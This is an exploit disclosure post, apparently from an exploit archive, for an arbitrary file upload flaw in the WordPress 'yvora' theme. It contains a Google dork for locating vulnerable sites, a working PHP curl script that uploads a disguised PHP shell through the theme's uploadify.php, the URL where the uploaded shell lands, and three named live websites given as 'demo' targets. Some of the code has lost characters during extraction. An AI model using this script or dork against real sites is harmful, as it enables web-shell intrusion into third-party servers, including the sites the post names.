facebook facebook twitter rss

Wordpress Themes- yvora Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 30-11-2012
-------------------------------------------------------------------------------
Wordpress Themes- yvora Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/yvora"
#
#######################################################################################

---------------------------------------------------------------------------------------

Exploit : uploadshell.php.jpg or .gif

<?php

$uploadfile
="dz.php.jpg";

$ch curl_init("http://www.localhost/wp-content/themes/yvora/sprites/js/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>


Shell Access : http://www.localhost/wp-content/themes/yvora/sprites/js/cufon-fonts/uploaded/custom_dz.php.jpg

<?php
phpinfo
();
?>


---------------------------------------------------------------------------------------

Demo :

1) http://askyvi.com/wp-content/themes/yvora/sprites/js/uploadify/uploadify.php

2) http://epeknights.com/santabarbara/wp-content/themes/yvora/sprites/js/uploadify/uploadify.php

3) http://www.ben2bath.com/wp-content/themes/yvora/sprites/js/uploadify/uploadify.php

-----------------------------------------------------------------------------------------

Like us on Facebook :